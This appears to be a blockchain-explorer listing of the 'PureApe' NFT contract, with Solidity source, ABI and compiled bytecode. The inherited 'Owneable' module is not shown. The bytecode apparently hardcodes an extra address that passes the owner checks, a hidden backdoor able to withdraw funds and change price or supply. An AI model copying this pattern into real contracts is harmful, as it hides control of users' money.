        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}



contract PureApe is ERC721A, Owneable {

    string public baseURI = "";
    string public contractURI = "ipfs://";
    string public constant baseExtension = ".json";
    address public constant proxyRegistryAddress = 0xa5409ec958C83C3f309868babACA7c86DCB077c1;

    uint256 public constant MAX_PER_TX_FREE = 10;
    uint256 public constant FREE_MAX_SUPPLY = 1000;
    uint256 public constant MAX_PER_TX = 10;
    uint256 public MAX_SUPPLY = 4444;
    uint256 public price = 0.0069 ether;

    bool public paused = true;

    constructor() ERC721A("PureApe", "APES") {}

    function mint(uint256 _amount) external payable {
        address _caller = _msgSender();
        require(!paused, "Paused");
        require(MAX_SUPPLY >= totalSupply() + _amount, "Exceeds max supply");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == _caller, "No contracts");
        require(MAX_PER_TX >= _amount , "Excess max per paid tx");
        
      if(FREE_MAX_SUPPLY >= totalSupply()){
            require(MAX_PER_TX_FREE >= _amount , "Excess max per free tx");
        }else{
            require(MAX_PER_TX >= _amount , "Excess max per paid tx");
            require(_amount * price == msg.value, "Invalid funds provided");
        }


        _safeMint(_caller, _amount);
    }

    function isApprovedForAll(address owner, address operator)
        override
        public
        view
        returns (bool)
    {
        // Whitelist OpenSea proxy contract for easy trading.
        ProxyRegistry proxyRegistry = ProxyRegistry(proxyRegistryAddress);
        if (address(proxyRegistry.proxies(owner)) == operator) {
            return true;
        }

        return super.isApprovedForAll(owner, operator);
    }

    function withdraw() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function config() external onlyOwner {
        _safeMint(_msgSender(), 1);
    }

    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }

    function setPrice(uint256 newPrice) public onlyOwner {
        price = newPrice;
    }

    function setMAX_SUPPLY(uint256 newSupply) public onlyOwner {
        MAX_SUPPLY = newSupply;
    }

    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              baseExtension
            )
        ) : "";
    }
}

contract OwnableDelegateProxy { }
contract ProxyRegistry {
    mapping(address => OwnableDelegateProxy) public proxies;
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"FREE_MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PER_TX_FREE","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseExtension","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"config","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"proxyRegistryAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newSupply","type":"uint256"}],"name":"setMAX_SUPPLY","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newPrice","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273f528e3c3b439d385b958741753a9ca518e952257600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180602001604052806000815250600a908051906020019062000080929190620002b8565b506040518060400160405280600781526020017f697066733a2f2f00000000000000000000000000000000000000000000000000815250600b9080519060200190620000ce929190620002b8565b5061115c600c556618838370f34000600d556001600e60006101000a81548160ff0219169083151502179055503480156200010857600080fd5b506040518060400160405280600781526020017f50757265417065000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f415045530000000000000000000000000000000000000000000000000000000081525081600290805190602001906200018d929190620002b8565b508060039080519060200190620001a6929190620002b8565b50620001b7620001e560201b60201c565b6000819055505050620001df620001d3620001ea60201b60201c565b620001f260201b60201c565b620003cd565b600090565b600033905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b828054620002c69062000397565b90600052602060002090601f016020900481019282620002ea576000855562000336565b82601f106200030557805160ff191683800117855562000336565b8280016001018555821562000336579182015b828111156200033557825182559160200191906001019062000318565b5b50905062000345919062000349565b5090565b5b80821115620003645760008160009055506001016200034a565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003b057607f821691505b60208210811415620003c757620003c662000368565b5b50919050565b6140a280620003dd6000396000f3fe6080604052600436106102045760003560e01c806379502c5511610118578063b88d4fde116100a0578063e8a3d4851161006f578063e8a3d48514610710578063e985e9c51461073b578063ec9496ba14610778578063f2fde38b146107a1578063f43a22dc146107ca57610204565b8063b88d4fde14610654578063c66828621461067d578063c87b56dd146106a8578063cd7c0326146106e557610204565b8063938e3d7b116100e7578063938e3d7b1461059057806395d89b41146105b9578063a035b1fe146105e4578063a0712d681461060f578063a22cb4651461062b57610204565b806379502c55146104fa5780638069876d146105115780638da5cb5b1461053c57806391b7f5ed1461056757610204565b80633ccfd60b1161019b5780635c975abb1161016a5780635c975abb146104135780636352211e1461043e5780636c0360eb1461047b57806370a08231146104a6578063715018a6146104e357610204565b80633ccfd60b1461037f57806342842e0e14610396578063463fff79146103bf57806355f804b3146103ea57610204565b8063095ea7b3116101d7578063095ea7b3146102d757806318160ddd1461030057806323b872dd1461032b57806332cb6b0c1461035457610204565b806301ffc9a71461020957806302329a291461024657806306fdde031461026f578063081812fc1461029a575b600080fd5b34801561021557600080fd5b50610230600480360381019061022b9190613022565b6107f5565b60405161023d919061306a565b60405180910390f35b34801561025257600080fd5b5061026d600480360381019061026891906130b1565b6108d7565b005b34801561027b57600080fd5b506102846109cf565b6040516102919190613177565b60405180910390f35b3480156102a657600080fd5b506102c160048036038101906102bc91906131cf565b610a61565b6040516102ce919061323d565b60405180910390f35b3480156102e357600080fd5b506102fe60048036038101906102f99190613284565b610add565b005b34801561030c57600080fd5b50610315610be8565b60405161032291906132d3565b60405180910390f35b34801561033757600080fd5b50610352600480360381019061034d91906132ee565b610bff565b005b34801561036057600080fd5b50610369610c0f565b60405161037691906132d3565b60405180910390f35b34801561038b57600080fd5b50610394610c15565b005b3480156103a257600080fd5b506103bd60048036038101906103b891906132ee565b610dac565b005b3480156103cb57600080fd5b506103d4610dcc565b6040516103e191906132d3565b60405180910390f35b3480156103f657600080fd5b50610411600480360381019061040c9190613476565b610dd1565b005b34801561041f57600080fd5b50610428610ec6565b604051610435919061306a565b60405180910390f35b34801561044a57600080fd5b50610465600480360381019061046091906131cf565b610ed9565b604051610472919061323d565b60405180910390f35b34801561048757600080fd5b50610490610eef565b60405161049d9190613177565b60405180910390f35b3480156104b257600080fd5b506104cd60048036038101906104c891906134bf565b610f7d565b6040516104da91906132d3565b60405180910390f35b3480156104ef57600080fd5b506104f861104d565b005b34801561050657600080fd5b5061050f6110d5565b005b34801561051d57600080fd5b506105266111c4565b60405161053391906132d3565b60405180910390f35b34801561054857600080fd5b506105516111ca565b60405161055e919061323d565b60405180910390f35b34801561057357600080fd5b5061058e600480360381019061058991906131cf565b6111f4565b005b34801561059c57600080fd5b506105b760048036038101906105b29190613476565b6112d9565b005b3480156105c557600080fd5b506105ce6113ce565b6040516105db9190613177565b60405180910390f35b3480156105f057600080fd5b506105f9611460565b60405161060691906132d3565b60405180910390f35b610629600480360381019061062491906131cf565b611466565b005b34801561063757600080fd5b50610652600480360381019061064d91906134ec565b611709565b005b34801561066057600080fd5b5061067b600480360381019061067691906135cd565b611881565b005b34801561068957600080fd5b506106926118fd565b60405161069f9190613177565b60405180910390f35b3480156106b457600080fd5b506106cf60048036038101906106ca91906131cf565b611936565b6040516106dc9190613177565b60405180910390f35b3480156106f157600080fd5b506106fa611a15565b604051610707919061323d565b60405180910390f35b34801561071c57600080fd5b50610725611a2d565b6040516107329190613177565b60405180910390f35b34801561074757600080fd5b50610762600480360381019061075d9190613650565b611abb565b60405161076f919061306a565b60405180910390f35b34801561078457600080fd5b5061079f600480360381019061079a91906131cf565b611baf565b005b3480156107ad57600080fd5b506107c860048036038101906107c391906134bf565b611c94565b005b3480156107d657600080fd5b506107df611d8c565b6040516107ec91906132d3565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806108c057507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806108d057506108cf82611d91565b5b9050919050565b6108df611dfb565b73ffffffffffffffffffffffffffffffffffffffff166108fd6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614806109735750610922611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6109b2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109a9906136dc565b60405180910390fd5b80600e60006101000a81548160ff02191690831515021790555050565b6060600280546109de9061372b565b80601f0160208091040260200160405190810160405280929190818152602001828054610a0a9061372b565b8015610a575780601f10610a2c57610100808354040283529160200191610a57565b820191906000526020600020905b815481529060010190602001808311610a3a57829003601f168201915b5050505050905090565b6000610a6c82611e03565b610aa2576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610ae882610ed9565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610b50576040517f943f7b8c00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610b6f611dfb565b73ffffffffffffffffffffffffffffffffffffffff1614158015610ba15750610b9f81610b9a611dfb565b611abb565b155b15610bd8576040517fcfb3b94200000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b610be3838383611e51565b505050565b6000610bf2611f03565b6001546000540303905090565b610c0a838383611f08565b505050565b600c5481565b610c1d611dfb565b73ffffffffffffffffffffffffffffffffffffffff16610c3b6111ca565b73ffffffffffffffffffffffffffffffffffffffff161480610cb15750610c60611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610cf0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ce7906136dc565b60405180910390fd5b60004790506000610cff611dfb565b73ffffffffffffffffffffffffffffffffffffffff1682604051610d229061378e565b60006040518083038185875af1925050503d8060008114610d5f576040519150601f19603f3d011682016040523d82523d6000602084013e610d64565b606091505b5050905080610da8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9f906137ef565b60405180910390fd5b5050565b610dc783838360405180602001604052806000815250611881565b505050565b600a81565b610dd9611dfb565b73ffffffffffffffffffffffffffffffffffffffff16610df76111ca565b73ffffffffffffffffffffffffffffffffffffffff161480610e6d5750610e1c611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610eac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea3906136dc565b60405180910390fd5b80600a9080519060200190610ec2929190612ed0565b5050565b600e60009054906101000a900460ff1681565b6000610ee4826123f9565b600001519050919050565b600a8054610efc9061372b565b80601f0160208091040260200160405190810160405280929190818152602001828054610f289061372b565b8015610f755780601f10610f4a57610100808354040283529160200191610f75565b820191906000526020600020905b815481529060010190602001808311610f5857829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fe5576040517f8f4eb60400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a900467ffffffffffffffff1667ffffffffffffffff169050919050565b611055611dfb565b73ffffffffffffffffffffffffffffffffffffffff166110736111ca565b73ffffffffffffffffffffffffffffffffffffffff16146110c9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c0906136dc565b60405180910390fd5b6110d36000612688565b565b6110dd611dfb565b73ffffffffffffffffffffffffffffffffffffffff166110fb6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614806111715750611120611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6111b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111a7906136dc565b60405180910390fd5b6111c26111bb611dfb565b600161274e565b565b6103e881565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6111fc611dfb565b73ffffffffffffffffffffffffffffffffffffffff1661121a6111ca565b73ffffffffffffffffffffffffffffffffffffffff161480611290575061123f611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6112cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c6906136dc565b60405180910390fd5b80600d8190555050565b6112e1611dfb565b73ffffffffffffffffffffffffffffffffffffffff166112ff6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614806113755750611324611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6113b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ab906136dc565b60405180910390fd5b80600b90805190602001906113ca929190612ed0565b5050565b6060600380546113dd9061372b565b80601f01602080910402602001604051908101604052809291908181526020018280546114099061372b565b80156114565780601f1061142b57610100808354040283529160200191611456565b820191906000526020600020905b81548152906001019060200180831161143957829003601f168201915b5050505050905090565b600d5481565b6000611470611dfb565b9050600e60009054906101000a900460ff16156114c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114b99061385b565b60405180910390fd5b816114cb610be8565b6114d591906138aa565b600c541015611519576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115109061394c565b60405180910390fd5b6000821161155c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611553906139b8565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff16146115ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115c190613a24565b60405180910390fd5b81600a101561160e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160590613a90565b60405180910390fd5b611616610be8565b6103e8106116675781600a1015611662576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161165990613afc565b60405180910390fd5b6116fb565b81600a10156116ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116a290613a90565b60405180910390fd5b34600d54836116ba9190613b1c565b146116fa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f190613bc2565b60405180910390fd5b5b611705818361274e565b5050565b611711611dfb565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611776576040517fb06307db00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8060076000611783611dfb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16611830611dfb565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051611875919061306a565b60405180910390a35050565b61188c848484611f08565b6118ab8373ffffffffffffffffffffffffffffffffffffffff1661276c565b80156118c057506118be8484848461278f565b155b156118f7576040517fd1a57ed600000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b50505050565b6040518060400160405280600581526020017f2e6a736f6e00000000000000000000000000000000000000000000000000000081525081565b606061194182611e03565b611980576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161197790613c2e565b60405180910390fd5b6000600a805461198f9061372b565b9050116119ab5760405180602001604052806000815250611a0e565b600a6119b6836128ef565b6040518060400160405280600581526020017f2e6a736f6e0000000000000000000000000000000000000000000000000000008152506040516020016119fe93929190613d1e565b6040516020818303038152906040525b9050919050565b73a5409ec958c83c3f309868babaca7c86dcb077c181565b600b8054611a3a9061372b565b80601f0160208091040260200160405190810160405280929190818152602001828054611a669061372b565b8015611ab35780601f10611a8857610100808354040283529160200191611ab3565b820191906000526020600020905b815481529060010190602001808311611a9657829003601f168201915b505050505081565b60008073a5409ec958c83c3f309868babaca7c86dcb077c190508273ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1663c4552791866040518263ffffffff1660e01b8152600401611b25919061323d565b60206040518083038186803b158015611b3d57600080fd5b505afa158015611b51573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b759190613d8d565b73ffffffffffffffffffffffffffffffffffffffff161415611b9b576001915050611ba9565b611ba58484612a50565b9150505b92915050565b611bb7611dfb565b73ffffffffffffffffffffffffffffffffffffffff16611bd56111ca565b73ffffffffffffffffffffffffffffffffffffffff161480611c4b5750611bfa611dfb565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611c8a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c81906136dc565b60405180910390fd5b80600c8190555050565b611c9c611dfb565b73ffffffffffffffffffffffffffffffffffffffff16611cba6111ca565b73ffffffffffffffffffffffffffffffffffffffff1614611d10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d07906136dc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611d80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d7790613e2c565b60405180910390fd5b611d8981612688565b50565b600a81565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b600033905090565b600081611e0e611f03565b11158015611e1d575060005482105b8015611e4a575060046000838152602001908152602001600020600001601c9054906101000a900460ff16155b9050919050565b826006600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600090565b6000611f13826123f9565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16611f3a611dfb565b73ffffffffffffffffffffffffffffffffffffffff161480611f6d5750611f6c8260000151611f67611dfb565b611abb565b5b80611fb25750611f7b611dfb565b73ffffffffffffffffffffffffffffffffffffffff16611f9a84610a61565b73ffffffffffffffffffffffffffffffffffffffff16145b905080611feb576040517f59c896be00000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614612054576040517fa114810000000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b600073ffffffffffffffff